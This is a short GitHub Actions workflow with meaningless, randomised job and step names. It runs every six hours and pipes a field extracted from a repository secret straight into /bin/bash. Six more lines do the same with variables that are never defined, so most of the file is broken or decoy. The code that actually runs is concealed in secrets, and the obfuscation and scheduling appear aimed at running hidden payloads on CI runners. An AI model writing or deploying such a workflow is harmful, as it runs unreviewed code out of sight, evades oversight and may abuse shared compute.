name: qiyuanjiao3812
on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiyuanjiao3812
        env:
          x214: ${{ secrets.x214 }}
        run: |
          echo $x214 | jq -r .mzsfj9020 | /bin/bash
          echo $pd6 | jq -r .t1605 | /bin/bash
          echo $pfrtt5725 | jq -r .yarr7 | /bin/bash
          echo $gelld01 | jq -r .tk9493 | /bin/bash
          echo $l0 | jq -r .gam4760 | /bin/bash
          echo $grevk761 | jq -r .t24 | /bin/bash
          echo $aqljp8 | jq -r .nojoo5829 | /bin/bash

